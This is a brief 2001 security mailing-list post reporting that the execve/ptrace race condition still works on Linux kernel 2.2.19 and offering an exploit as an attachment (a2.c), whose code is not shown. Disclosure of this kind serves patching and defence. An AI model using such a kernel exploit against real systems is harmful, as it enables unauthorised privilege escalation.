Linux Kernel 2.2.x
Date: Thu, 23 Aug 2001 18:31:30 -0400
From: Silvio Mazzaro <[email protected]>
To: [email protected]
Subject: Linux Kernel 2.2.x
Hi all!!
The execve/ptrace race condition still appears to work on Linux kernel
2.2.19.
Here is the exploit...
Bye,
Silvio
[Attachment: a2.c]